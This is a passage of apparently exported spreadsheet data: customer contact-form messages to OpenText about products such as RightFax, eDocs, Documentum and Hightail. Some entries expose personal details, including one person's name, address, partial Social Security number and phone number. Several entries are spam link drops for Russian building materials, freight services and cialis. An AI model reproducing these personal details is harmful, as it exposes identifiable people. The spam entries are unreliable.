    <t>Gostaríamos de saber o opentext bi é uma evolução do HummingBird BI e, em caso afirmativo, gostaríamos de um contato para conversamos a respeito. Grato.</t>
  </si>
  <si>
    <t>Hello, I am acting as consultant to a large corporate legal department which is interested in seeing a demo of eDocs as a possible solution for its document management/collaboration needs. Could you possibly let me know who to discuss this with and I will send an email with further details. Many thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot install Brava Reader.  Please help! </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
This is regarding Trusted Link application on iSeries. We have TLi Ver 6.02.00 installed on our iSeries which is installed on OS400 V7R1 . We are planning to upgrade our iSeries system OS400 to V7R3. We want to check with you if this TLi version is compatible with iSeries OS V7R3. Please confirm.  _x000D_
   </t>
  </si>
  <si>
    <t>Configuração e utilizacão de VAN.</t>
  </si>
  <si>
    <t>SkyWest currently has a license for Exceed OnDemand but need to get a hold of Exceed TurboX for our migration with Jeppesen.  We need to perform some testing with TurboX to determine the feasibility of using a virtual environment.  Any help with this would be great.</t>
  </si>
  <si>
    <t>Our Company uses ECM and Enterprise Connect... but I cannot find any training instructions/tutorials or whatever, on how to use the Search Capabilities of Enterprise connect._x000D_
I'm specifically talking about doing Pinpoint Defined Searches in an Description Field._x000D_
There has to be tutorials or training info somewhere.</t>
  </si>
  <si>
    <t>Upgrading RightFax.  Need information regarding licensing, server specs, etc.  Urgent</t>
  </si>
  <si>
    <t>Conhecer as soluções da opentext.</t>
  </si>
  <si>
    <t>Employment opportunity</t>
  </si>
  <si>
    <t>Opportunity for Rightfax sale</t>
  </si>
  <si>
    <t xml:space="preserve">Have 1 user in compliance department that faxes 8,000-10,000 pages monthly. Many faxes are 200-400 pages long. Our current on-prem fax system is inadequate for this volume and generates many transmission failures. Would like to explore a free trail if your cloud solution would alleviate our faxing woes with this user.  No number to port.  Thank you. _x000D_
_x000D_
- Gabe </t>
  </si>
  <si>
    <t xml:space="preserve">We are currently looking to upgrade our OpenText Vendor Invoice Management from 7.0 to 7.5 and I would like to talk with someone about risks and guidance on this upgrade. </t>
  </si>
  <si>
    <t>Can you please email me the latest administrator's guide for version 16.4?_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to know more about the services that OpentText provide. </t>
  </si>
  <si>
    <t>Please provide a list of small company vendors that have implemented your product in an Azure environment with the Department of Defense. We are looking for referenceable accounts.</t>
  </si>
  <si>
    <t>We are currently researching Document Management Systems for Corporate Legal Departments and are interested to see a demo of your solution.  I look forward to hearing from you.</t>
  </si>
  <si>
    <t>We are evaluating several ECM products and initiating an RFI in search of a healthcare focused content management tool. I am looking for a technical or business representative to whom I can send an RFI when ready. Please let me know who I can reach out to. Email is my preferred contact method. Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I am a technical author with the Department of Veterans Affairs performing some requirements gathering for OpenText LiquidOffice to update our entry on it in the VA’s Technical Reference Model (TRM). The TRM is a repository of all technologies that have been reviewed for use in the VA that contains product information, system requirements, etc. for VA employees use. Can you please help me by addressing the following:_x000D_
_x000D_
•             Can you please provide the most recent version number? _x000D_
•             Can you please provide system requirements needed for operation?_x000D_
•             If you have any other product documentation that may be helpful that you can provided that would be appreciated._x000D_
_x000D_
Thank you,_x000D_
David_x000D_
</t>
  </si>
  <si>
    <t>Participar de "Events &amp; Webinars"</t>
  </si>
  <si>
    <t>Looking for a document managment system to support regulatory and QA for a growing pharma company.</t>
  </si>
  <si>
    <t>Interested in career opportunities.</t>
  </si>
  <si>
    <t>Looking for details about ediscovery solutions and services by opentext. would appreciate a quick connect ._x000D_
thanks_x000D_
Apurv</t>
  </si>
  <si>
    <t>Hello there,_x000D_
We would like to ask some technical and commercial info on OpenText Web Content Management WCM that may be useful for our client's projects. Our team is based in Sydney &amp; Singapore, just wondering if you have a Singapore representative that we can speak to? _x000D_
Thank you!_x000D_
Cheers</t>
  </si>
  <si>
    <t>Dear Partner, Sanofi aims to invite you to EDI RFP in Russia and we are searching for the right person contacts. Please send me back the relevant data if you are interested in potential collaboration.</t>
  </si>
  <si>
    <t xml:space="preserve">грузоперевозки Россия Казахстан отзывы_x000D_
международные грузоперевозки Томск_x000D_
недорогие международные грузоперевозки Тюмень_x000D_
недорогие грузоперевозки Россия Казахстан отзывы_x000D_
недорогие международные грузоперевозки Челябинск_x000D_
недорогие международные грузоперевозки РФ РБ_x000D_
международные грузоперевозки Челябинск_x000D_
международные грузоперевозки Новосибирск отзывы_x000D_
международные грузоперевозки Пермь отзывы_x000D_
международные грузоперевозки Челябинск отзывы_x000D_
 _x000D_
[URL="https://mityr-trans.com/avtopark/20-tonnik-s-40-futovym-kontejnerom.html"]недорогие международные грузоперевозки Екатеринбург отзывы[/URL] _x000D_
грузоперевозки Омск отзывы_x000D_
недорогие международные грузоперевозки Томск_x000D_
международные грузоперевозки Новосибирск_x000D_
международные грузоперевозки Пермь отзывы_x000D_
грузоперевозки Россия Беларусь_x000D_
недорогие международные грузоперевозки Пермь отзывы_x000D_
международные грузоперевозки_x000D_
международные грузоперевозки Томск отзывы_x000D_
недорогие международные грузоперевозки Омск_x000D_
грузоперевозки Новосибирск_x000D_
</t>
  </si>
  <si>
    <t>I am unable to download the OpenText Capture Center Product Sheet. Kindly provide me with any other informative on this product as well. Thanks.</t>
  </si>
  <si>
    <t>How do I get access to my Hightail folders</t>
  </si>
  <si>
    <t>Would like information on your Fax2Mail service.  Thank you.</t>
  </si>
  <si>
    <t>I call in to accept my service. I got this woman ask me the same thing over and over again._x000D_
Here is my Name Mary J. Tribble  - address 1333 N Street. NW, Washington DC 20005_x000D_
my SS last numbers 8586  my phone number 202-817-5089 my email is Mary53Tribble@gmail.com if you have any more question please email me and I will get back with you. Please help me thanks Mary J. Tribble</t>
  </si>
  <si>
    <t>Have a short turnaround to provide a business case for implementation of a case management solution to automate and track workflow for responding to FOIA requests. Was suggested to consider Documentum XCP as a possible option. Would like to get details and see if it meets our requirements and is cost-competitive.</t>
  </si>
  <si>
    <t xml:space="preserve">we  have the HP 527 and 577 already in production… we consider both of those High Volume units… we are looking for something LOW Volume for individuals or light use scenarios._x000D_
do you have an updated list of compatible printers?  your website list seems to be out of date with old models. </t>
  </si>
  <si>
    <t>消息1消息1消息1消息1消息1消息1消息1消息1</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
i was wondering if your application - Rightfax was compatible with Windows 10?_x000D_
_x000D_
Thanks,_x000D_
Sofia Moskalenko</t>
  </si>
  <si>
    <t>We would like to connect with sales to ask about available feature we have in the software and the difference between Open text and Easy link. If we would like to get more users what is the process and cost. We are in eastern time and you can contact me between 9 - 5 Eastern time. Can someone connect with me  tomorrow at or around 9 to discuss about it._x000D_
Thank You_x000D_
Syed S Ali</t>
  </si>
  <si>
    <t>газосиликатный _x000D_
 _x000D_
[url=http://тверь.газоблок-рст.рус]газоблок[/url]</t>
  </si>
  <si>
    <t>пенобетонный _x000D_
 _x000D_
[url=http://газоблок-рст.рус]газосиликат[/url]</t>
  </si>
  <si>
    <t>пеноблоки _x000D_
 _x000D_
[url=http://gazobeton-tver.portalsnab.ru]газобетон[/url]</t>
  </si>
  <si>
    <t>газосиликатный _x000D_
 _x000D_
[url=http://пеноблок-рст.рус]пеноблоки[/url]</t>
  </si>
  <si>
    <t>газосиликатный _x000D_
 _x000D_
[url=http://gazobeton.portalsnab.ru]газосиликатный[/url]</t>
  </si>
  <si>
    <t>We are a systems integrator that recently won a contract for the federal government that includes support of a large eDOCS based content management system.  We are interested in finding out about OpenText partner programs, as well as training opportunities for our staff.  _x000D_
Thanks,_x000D_
Ryan</t>
  </si>
  <si>
    <t xml:space="preserve">We would like a quote on two hours of eDocs 10 training for 3 employees. </t>
  </si>
  <si>
    <t xml:space="preserve">We have a big implementation of open text and we need to develop and prepare our team in order to have an in house team that can develop new functionalities according to business team._x000D_
_x000D_
I would like to have information about training and certifications in open text, we are around 6 people in the team. _x000D_
</t>
  </si>
  <si>
    <t>Looking to use edocs</t>
  </si>
  <si>
    <t>My saved folders and lightbox images have disappeared from my account.</t>
  </si>
  <si>
    <t>пеноблоки _x000D_
 _x000D_
[url=http://псков.газоблок-рст.рус]газобетоный[/url]</t>
  </si>
  <si>
    <t>газосиликат _x000D_
 _x000D_
[url=http://gazobeton.portalsnab.ru]газосиликатный[/url]</t>
  </si>
  <si>
    <t>газосиликат _x000D_
 _x000D_
[url=http://gazobeton-tver.portalsnab.ru]газоблок[/url]</t>
  </si>
  <si>
    <t>газоблок _x000D_
 _x000D_
[url=http://gazobeton.portalsnab.ru]газосиликатный[/url]</t>
  </si>
  <si>
    <t>пеноблоки _x000D_
 _x000D_
[url=http://тверь.пеноблок-рст.рус]пеноблоки[/url]</t>
  </si>
  <si>
    <t>пенобетонный _x000D_
 _x000D_
[url=http://gazobeton-tver.portalsnab.ru]газосиликат[/url]</t>
  </si>
  <si>
    <t>Hi there. I'm curious about your VAN services. Specifically, what are your fees for VAN Mailbox and/or VAN document processing (service bureau)? Please email, not call. Thanks!</t>
  </si>
  <si>
    <t>Upgrade to a newer version of RightFAX and look at other options that will suite our needs.</t>
  </si>
  <si>
    <t xml:space="preserve">need quote for Openttext Exceed / 300 user license </t>
  </si>
  <si>
    <t>Attempting to register for 2 classes, when clicking submit, the webpage crashes. When I call Customer Service, they tell me they can't do anything about it.  When I call the Open Text office (Ottawa), I'm provided with a "run-around" of voicemails. I simply want to be able to speak with a person and register for 2 courses (one of them is scheduled to start 2018.08.27).</t>
  </si>
  <si>
    <t>My firm is a systems integrator and we would like to find out how to get access to an NFR eDocs system, or work with an eDocs VAR to test out an integration on a demo/lab environment.</t>
  </si>
  <si>
    <t>Need technical support regarding an issue of losing access to saved image folders and lightbox images. Logging in, all have disappeared. Customer service would not help because I don't have access to customer support.......</t>
  </si>
  <si>
    <t>Buongiorno,_x000D_
sono l'It manager di Roche Diagnostic Italia, vorrei incontrarvi per visionare il vostro prodotto Documentum_x000D_
grazie</t>
  </si>
  <si>
    <t>Interest in the Cloud fax product</t>
  </si>
  <si>
    <t>I ported number 603-471-0077 to fax2mail (number 8662188548).  Name on account is Dominic Vecchione.  Please confirm this has been done.  Currently, when you call 603-471-0077, it just rings.</t>
  </si>
  <si>
    <t>Required Inforarchive presales /sales connect in india</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to promote your products / solutions in Bangladesh Market for Banks and Enterprise. we have good number of penetration in Banking, Stock Exchange, Telco, Regulators, etc._x000D_
</t>
  </si>
  <si>
    <t>We are doing research about CCM companies, could you please send me information about your electronic bill generation services and if you have bill printing services, could you send me information on that?</t>
  </si>
  <si>
    <t>Hello;_x000D_
Recently we deal with  a customer company who wants Integrate EBA to Opentext and _x000D_
my question is that; let say we create some gui forms and our customer want we change some things on form. Is it possible to change form backend with any language? Or do you use any specific language for backend?</t>
  </si>
  <si>
    <t>Inquiry about implementing OpenText Extended ECM for SAP SuccessFactors here at Straumann North American HQ.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
İ would like to join your development web portal, but i couldn't create account via "Need an account" section. How can i create account and read document ?_x000D_
_x000D_
Best regards,_x000D_
Selcuk</t>
  </si>
  <si>
    <t>Looking to upgrade our business document management system.  Would like to speak to a representative to understand which of the Documentum products (or combination of products) would best suit our requirements.</t>
  </si>
  <si>
    <t>Details about FAX2EMAIL</t>
  </si>
  <si>
    <t>I do have a support contract but can't used it on my account IT_Systems@roularta.be. I receive the follow page:_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Please click on the link below to complete the process_x000D_
_x000D_
Request Confirmation Email_x000D_
_x000D_
Confirming the requested confirmation email does not help._x000D_
_x000D_
Maintenance number 0016010272_x000D_
_x000D_
Bart Lowagie</t>
  </si>
  <si>
    <t>Where can I download Enterprise World 2018 slides?</t>
  </si>
  <si>
    <t>Obtain your license key_x000D_
Please visit: support and follow the below steps:_x000D_
Click on Accounts on the Top Menu_x000D_
Select Activations/Keys_x000D_
_x000D_
I followed all of these steps to be told "No Access_x000D_
We're sorry, your account does not grant you access to this resource." Please help</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I want to know how to become Open Text Business Partner? We are a Local Company in Indonesia and have several customer is using Open Text, but we have difficulties to support them because we can not open case directly to Open Text and have to buy to other BP which the support is not good._x000D_
We have technical team which 1 of them is quite familiar with Open Text, so we want to become Open Text Business Partner who can sell, install and maintain the system directly partnering with Open Text._x000D_
_x000D_
Please advice. Thanks.</t>
  </si>
  <si>
    <t>We are using Exstream version 9 and looking for an add-on/tool that allows us to view AFP print files.  In the past there's a component called "Output or Output compare" something like that.  I'm just wandering if you still have that component now.  Could you please provide me some information?_x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>Recherché partenaire EDi dans le cas de l'implémentation d'un nouvel ERP pour l'une de nos divisions.</t>
  </si>
  <si>
    <t>Hi OpenText! I hope all is well. I know how busy you probably are, but I recently applied and been interviewed to the Mapping Quality Analyst position, and wanted to check in on your decision timeline. I am excited about the opportunity to join OpenText._x000D_
Please let me know if it would be helpful for me to provide any additional information as you move on to the next stage in the hiring process. I look forward to hearing from you.</t>
  </si>
  <si>
    <t>Hi there, can you please send the OpenText AppWorks logo for us to use on our website. Right now we only have the old AppWorks logo's. So I prefer to update them according to your new branding._x000D_
BR, Maurice</t>
  </si>
  <si>
    <t>Establish new rightfax user</t>
  </si>
  <si>
    <t>Hello, we are looking into a relaunch of our DAM process and possibly system. We already have a DAM system but would like to also consider solutions from other providers. It would be good if we could have a short call and/or a demo regarding your DAM solution. I have seen that you have an office in Oldenburg, so if possible of course a short meeting at our office might also be an option, but we can also have a call first._x000D_
_x000D_
Best regards_x000D_
_x000D_
Katrin Meiners</t>
  </si>
  <si>
    <t xml:space="preserve">I am an inquisitive, energetic and hardworking computer science engineer with experience in C and Java Development looking for an opportunity to work in an enthusiastic team and also contribute to development of the organization. </t>
  </si>
  <si>
    <t>你好！</t>
  </si>
  <si>
    <t>Dears _x000D_
_x000D_
Trust you find this email well.  _x000D_
_x000D_
My name is Jamil and I am an SMS Account Manager Support working with the leading SMS Hub, Monty Mobile, an International GSMA certified Hub connected globally to hundreds of countries and destinations and can deliver any text or SMS to anyone worldwide at much cheaper rates than the normal mobile networks. _x000D_
_x000D_
I was wondering if we can cooperate and offer you to use us for your SMS services whether it is for PIN verification, PIN sending for Apps activation or for promotion or marketing and Bulk SMS._x000D_
	_x000D_
While we cover more than 230 Million End User with operators such as Orange, MTN, Etisalat, Zain, Hutchison , TriMob, Telkomcel, Expresso, Plus and many others, we are equally connected to more than 450 Mobile Operators worldwide._x000D_
_x000D_
I would be very thankful if you kindly redirect this message to the right POC if you are not the person in charge. _x000D_
_x000D_
Best Regards,_x000D_
Jamil Shatila</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Are you interested to Kronos Users?_x000D_
_x000D_
We have 1000 Ready-to- buy leads of Kronos  Technology Customers Records from California._x000D_
We will provide Test file to check quality_x000D_
_x000D_
kindly get back to us for more information_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
ich betreue ein mittelständisches Unternehmen, ca 100 Mitarbeiter, ca 15Mio EUR Umsatz. Wir sind Hersteller von elektronischen Komponenten und Leistungselektronik, vorwiegend für die Automobilindustrie._x000D_
_x000D_
 Wir benötigen kurzfristig zur Umsetzung der GoBD-Richtlinien ein konformes ECM-System, Einführung bis Ende 2018. Das Ziel-System soll zukünftig auch andere Bereiche unterstützen, z.B. Produktentwicklung und Produktion (Produktnachverfolgung, evtl. Anbindung an ein MES), HR. Zum Einsatz kommen Microsoft-Systeme, Exchange on Premise, Office 365 (in Vorbereitung), Dynamics NAV als ERP, gehostet auf VMware ESXi._x000D_
_x000D_
Ich kenne OpenText als eMail-Archivierung im Corporate-Umfeld (Eli Lilly, Pharma, 60K User, Migration von Lotus Notes, Record Retention Requirements) und könnte mir eine ähnliche Lösung gut für die GoBD-Problematik vorstellen._x000D_
_x000D_
Bitte kontaktieren Sie mich via e-Mail für eine Terminvereinbarung zu einem telefonischen Vorgespräch._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Dirk Daeumichen</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are currently in contact with Mr. Jianen Ren (Account Executive, Portfolio, ANZ) with regards to our order of Brava Desktop for our client. We have submitted the PO to Jianen last June 29, 2018 and up until now the order/license hasn't been release to our end-user. He is mentioning that a Shared Service Depart located in Ontario, Canada has been working on it, may we know someone who can give us definite information this. We have been chased by the end user for weeks now because they badly need this software for their projects, and they are currently having delays. Can someone from your end give us a call, ASAP or at least send us an email ASAP, m.escolano@cimtechnologies.com and j.grospe@cimtechnologies.com_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>This is GongDou from Sumitomo China site in Shenzhen._x000D_
We want to buy Brava-desktop software, but we cannot purchase from your website directly. Due to we need to follow the company's purchase rule(Ask quotation--&gt;release PO--&gt;got the software)._x000D_
_x000D_
If you have authorized agency in China, please tell me how to contact them.(email address and phone#)_x000D_
If there is no agency, please tell us how to buy it._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Looking for EIM solution , Content Management &amp; Archving</t>
  </si>
  <si>
    <t xml:space="preserve">锘?
_x000D_
vmate rrs definitely an software package that allows you to copy [url=http://www.vmate.in/]vmate[/url] classes not to mention songs coming from your Youtube, Metacafe, Vimeo, Soundcloud and simply since additional hot several webpages. your request helps you review numerous taping solutions or perhaps a songs of varied character. it's true, one may purchase type class in video tutorials or to record that you wish to. it is possible transfer full hd (hd) media available identical. All usual and dealing saving bookmarks are supplied over here and don鈥檛 worry about that after all. It lets you get pleasure from the classes and it could be songs straightly when not having them to be [url=http://www.vmate.in/]vmate[/url] downloaded. grab - vmate instance._x000D_
</t>
  </si>
  <si>
    <t>Hello - we are actually existing business customers with OpenText for 15+ years and we use your Rightfax server running in a local install w/ version 10.6 FP1 SR2. _x000D_
_x000D_
We recently migrated all of our on-premises servers to the cloud and the only server left in our office is our Rightfax server, so we would like to migrate our service to the Rightfax Hybrid cloud solution. I believe this solution would allow us to host our gateway Rightfax server in our cloud as well, and it would forward all telephony requests to the OpenText cloud, and i think this would be a great solution for us, i hope._x000D_
_x000D_
I would like to get this implemented by mid-August, so if someone could contact me to get going i would appreciate that. Thanks!</t>
  </si>
  <si>
    <t>Hi, I accidentally opened account with yourself instead of Open Text Core. Can you please remove me. Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">I recently received an email message from Opentext (see below), however I am unable to login into the new site.  It is not recognizing my email address which was degrech@powercor.com.au (we are now trading under Beon Energy Solutions) however there is no reason why it shouldn't recognize my old email address if that was how I originally registered with Hightail.  I need someone to contact me immediately to allow access.  Otherwise please refund recent deduction and cancel our account and do not continue with an annual fee charge._x000D_
_x000D_
Regards_x000D_
_x000D_
Deshia_x000D_
_x000D_
_x000D_
Your receipt		_x000D_
Order ID: ch_1CnI8JCoGUa9VTUc6n5hMzRc		_x000D_
_x000D_
_x000D_
Your Card •••• •••• •••• 8632 was charged $144.00_x000D_
You'll be charged $144.00 every year				_x000D_
_x000D_
	_x000D_
</t>
  </si>
  <si>
    <t>To know on the Customer Communications conversion tool, which could migrate xPression Templates to Exstream templates.</t>
  </si>
  <si>
    <t>order cheap cialis 40mg _x000D_
 _x000D_
 [url=http://cialisbuyap.com/]cialis cheap[/url] _x000D_
    &lt;a href="http://cialisbuyap.com/"&gt;cialis cheap&lt;/a&gt; _x000D_
 _x000D_
cialis kaufen per uberweisung</t>
  </si>
  <si>
    <t>We are looking for OEM your ISIS Scanner Drivers &amp; PixTools Toolkit for our OceanX Capture solution. Please provide your OEM pricing and trial version. Thanks</t>
  </si>
  <si>
    <t>online cialis canada pharmacy _x000D_
 _x000D_
 [url=http://cialisbuyap.com/]cialis cheap[/url] _x000D_
    &lt;a href="http://cialisbuyap.com/"&gt;cialis online&lt;/a&gt; _x000D_
 _x000D_
cialis moins cher en belgiqu</t>
  </si>
  <si>
    <t>Well, I have been trying to get help as my fax doesn't work anymore, last received was on 3 July, although I can send with no problem.I have been trying to get help form the helpdesk, but no one seems to care much. Can you please assist?</t>
  </si>
  <si>
    <t>I am trying to sign up for the webinar: What's new in OpenText RightFax 16 Enhancement Pack 4? But I don't see it on the webpage</t>
  </si>
  <si>
    <t>пенобетон _x000D_
 _x000D_
[url=http://penobeton-pskov.portalsnab.ru]пеноблоки[/url]</t>
  </si>
  <si>
    <t>xPression support. We have now a productive xPression server and need support for update  and manteniance</t>
  </si>
  <si>
    <t>пенобетонный _x000D_
 _x000D_
[url=http://gazobeton-tver.portalsnab.ru]газоблок[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
Would you mind to support to me ?_x000D_
I have an user_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I requested login information, but I can't tell if I am linked to my company's account. How do I see my company's catalog? </t>
  </si>
  <si>
    <t xml:space="preserve">Good evening!_x000D_
Would you mind to support to me in the following issue?_x000D_
I tried to use your web , in order to modify a ticket , and when I access to your  web page and type my user name areyes_vera@hotmail.com , the page responded to me that I can not  access my ticket 3805057._x000D_
Best regads,_x000D_
Jose Armando_x000D_
</t>
  </si>
  <si>
    <t>Interested in Opentext for Custom Critical EDI and other customer automation</t>
  </si>
  <si>
    <t xml:space="preserve">I need to get these entity ID's added to my profile so I can download software and patches as needed.  _x000D_
Nickname: "MSHA Denver Federal Building"_x000D_
End User Code: EU0309818_x000D_
This is for Teleform_x000D_
_x000D_
Nickname: "US Mine Safety and Health Administration"_x000D_
End User Code: EU0028964_x000D_
This is for eDOCS_x000D_
</t>
  </si>
  <si>
    <t>Inquiring about pricing for the BIRT tools as well as additional questions.</t>
  </si>
  <si>
    <t>We have a customer that needs a quote for OpenText RightFax. Are all purchases direct with your company or do I request a quote through a distributor?</t>
  </si>
  <si>
    <t xml:space="preserve">We are an urban planning firm and currently conduct a large amount of open ended text analysis, which requires us to manually add codes and themes to the text in order to find sentiments, themes and key ideas. We are looking for a program to assist us with text our text analysis in order to help streamline our process. </t>
  </si>
  <si>
    <t>Hi,_x000D_
I am trying to figure out which version (and beyond) of OpenText ExStream are compatible with Win 10 operating system. Please share if you have this information._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>We purchased 14 network seats of Brava 7.2 back in 2014.  We are needing to add more seats, but we also need to renew/update our current 14 seats.  I would like to receive information on upgrading/updating to the latest version and increasing our count to 20 seats.  Thank you</t>
  </si>
  <si>
    <t>We just need temporary support, your group has helped us once before.  We just have questions about an IP change on our Documentum servers.  Pinnacle is being acquired by Penn Gaming so due to IP conflicts we will be changing the IP address of servers  where Documentum resides. Do you know what we need to do in order to ensure we are still able to use Documentum after the IP change?</t>
  </si>
  <si>
    <t>Hello, I need a quote for Vista Plus Output Manager_x000D_
Thank you,_x000D_
Amy</t>
  </si>
  <si>
    <t>Hello,_x000D_
We want to make a bill modification, also because I am unable to access to my support, it requieres confimate the email, after confirm the email the page still telling me that I need to confirm the account._x000D_
It is possible to get a call from ?_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>discuss partnership opportunities</t>
  </si>
  <si>
    <t>Brava! Desktop TX support.  The brava client is truncating file links in PDFs and we cannot open linked documents.</t>
  </si>
  <si>
    <t xml:space="preserve">Realizando a manutenção e vendas de Medidores Eletrônicos, Drone,Palms e Coletores de dados na carteira de clientes,através de atendimento personalizado,visando também a expansão de novos produtos._x000D_
Atendendo as principais empresas do setor de Energia na região Norte , Nordeste, Minas Gerais e interior de São Paulo, como,  AES Eletropaulo,  Cemig,Copel, Neoenergia,Energisa,Eletrobrás, Elektro. _x000D_
Projetos e concorrências vencidas: Grupo Neoenergia, AES Brasil, Cemig, Eletrobrás:  Vendas de Medidores Eletrônicos, Drone, Palms, Coletores de Dados. _x000D_
</t>
  </si>
  <si>
    <t>Hi, I am not sure if I am reaching the right place.  I work with GCDOCS and I am looking for a course/training on how to add pictures/videos and make good products and share to users.  Mostly to use the features to embed with tumpnails, slides to share.  Thanks</t>
  </si>
  <si>
    <t>Need a fax server that receives faxes and sends them via email and is compatabile with Start/TLS</t>
  </si>
  <si>
    <t>Product info,   FOIP,  Right Fax,  Redundancy options.    I did call earlier and left a message on your Sales line</t>
  </si>
  <si>
    <t>Interest in partnering on U.S. Dept. of Defense Defense Logistics Agency Opportunity</t>
  </si>
  <si>
    <t>Vendor</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
unser gemeinsamer Kunde die Malteser Krankenhäuser setzt die Software Gupta Report Builder ein._x000D_
_x000D_
Mit dieser E-Mail bitten wir um Auskunft zur DSGVO-Konformität._x000D_
-	Ist ein Löschkonzept zur Anwendung auf im System vorhandene personenbezogene Daten implementiert?_x000D_
-	Ist die Möglichkeit zur Anonymisierung personenbezogener Daten vorhanden?_x000D_
-	Ist zur Einhaltung ein Update der Software in unserer Cloud-Umgebung notwendig?_x000D_
_x000D_
Vielen Dank im Voraus für die Auskunft._x000D_
_x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Alexander Göbbels_x000D_
Team Medizinische Systeme_x000D_
IT Medical &amp; Care Solutions_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">In need of a document control management system. Needs:  ability for third parties to submit transmittals to a managed mailbox, provide notifications to interested parties, track incoming and outgoing documents with user and date info. We are the owner of the capital projects and use EPC's to manage transmittal generation so we do NOT need the ability to generate transmittals or revs. I am interested in ballpark estimates for the purposes of pursuing this discussion with management. I do not have a lot of time to invest in explaining our needs until I know whether the budget is a range that I can work with. Email correspondence is preferable. Thanks._x000D_
</t>
  </si>
  <si>
    <t>There are different ways to fry tomatoes, but each of them will require cook to spend several hours in the kitchen, so this dish is usually better correct  prepare on weekends or for special occasions. When tomatoes are roasted, they get a deep taste and are combined with seafood, antipasto and other roasted vegetables. Moreover, they are good suitable for application in the baking industry, in making bread or cake with custard. _x000D_
[url=http://stewedtomatoes.top/how-to-cook-sweet-stewed-tomatoes-at-home]Sweet stewed tomatoes[/url]</t>
  </si>
  <si>
    <t>We are working on a fairly large deal at a hospital in Amarillo, TX and they are wanting us to include a fax server as part of the solution.  Rite Fax is the best name in the industry so I would like to have someone contact me about having us act as a reseller in this circumstance.  Additionally, I need to speak to someone with technical knowledge to configure the offering.  Please call me asap.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted to verify that you still offer Open Text Desktop Viewer VME 3D+ version 8.x and that it allows for the viewing of .dwg files.  This precise product is needed because it is the only one that can be installed on our network.  _x000D_
_x000D_
Thank you.  Please reply via e-mail, not via phone.  </t>
  </si>
  <si>
    <t xml:space="preserve">We licensed a search API for Westlaw UK (WLUK) to yourselves a few years back and are making some changes to the same that will affect all of our mutual customers accessing WLUK via your product. I urgently would like to speak to someone regarding this please. Many thanks in advance. _x000D_
_x000D_
Lloyd Bennett_x000D_
</t>
  </si>
  <si>
    <t>We have a project for 2019 for group-wise DMS and workflow for 2300 users.  We started to use Documentum for one department (On-premises) last year.  This time, I got an opportunity to budget for a project using Opentext Core.  Please provide budget for 2300 users ASAP.   _x000D_
_x000D_
Does buying Opentext Core means that I can have both DMS and workflow?_x000D_
_x000D_
Regards,_x000D_
Alex</t>
  </si>
  <si>
    <t>I registered for OTEW using my personal address but would like my registration transferred to this account: marc.morcos@cic.gc.ca   .  I'd like this done so I'm able to access all of the OTEW material using my knowledge centre account._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I just would like to confirm if my application for Senior HR Manager and Business Partner was received by OpenText.  I didn't receive any confirmation and when I tried again, I received an error message.  Thank you.</t>
  </si>
  <si>
    <t>I need to update our email address from Licence.Management@nationwide.co.uk to SoftwareAsset.ManagementTeamMailbox@nationwide.co.uk as the other mailbox is no longer in use</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I think my company has an active OpenText Customer Support maintenance contract and I want access to My Support to find software, patches and documentation. _x000D_
Unfortunatelly, I don't know how to complete the Access Forms. What is the Product Line for my company ?_x000D_
I thank you in advance for your help._x000D_
Best regards </t>
  </si>
  <si>
    <t>We have an requirement to implement latest doculink software for the client. Already have the quotation from livelink but unable to reach the sales representative who gave the quotation. Need someone from livelink with who we can discuss on the implementation plan asap</t>
  </si>
  <si>
    <t>I am a certified translator of English, Hebrew and Chinese with 5 years experience._x000D_
I would like to apply to join your translator team._x000D_
best regards_x000D_
orna</t>
  </si>
  <si>
    <t>With Hightail - transferred to Opentext - registered - keeps saying no access -  just want to send large file - advise system procedure to do this step by step -  site is most confusing</t>
  </si>
  <si>
    <t xml:space="preserve">грузоперевозки Омск отзывы_x000D_
недорогие грузоперевозки Тюмень отзывы_x000D_
недорогие грузоперевозки Омск отзывы_x000D_
международные грузоперевозки Россия Казахстан отзывы_x000D_
недорогие международные грузоперевозки Омск отзывы_x000D_
международные грузоперевозки Омск отзывы_x000D_
недорогие грузоперевозки Челябинск отзывы_x000D_
недорогие грузоперевозки Челябинск_x000D_
грузоперевозки Россия Беларусь отзывы_x000D_
недорогие грузоперевозки Екатеринбург отзывы_x000D_
 _x000D_
[URL="https://mityr-trans.com/avtopark/10-tonnik-tentovannyj.html"]международные грузоперевозки Россия Беларусь отзывы[/URL] _x000D_
международные грузоперевозки Тюмень отзывы_x000D_
международные грузоперевозки Россия Казахстан_x000D_
недорогие международные грузоперевозки Челябинск_x000D_
грузоперевозки Челябинск_x000D_
грузоперевозки Екатеринбург_x000D_
международные грузоперевозки Томск отзывы_x000D_
недорогие грузоперевозки Россия Казахстан_x000D_
недорогие международные грузоперевозки Новосибирск отзывы_x000D_
недорогие международные грузоперевозки_x000D_
грузоперевозки Пермь_x000D_
</t>
  </si>
  <si>
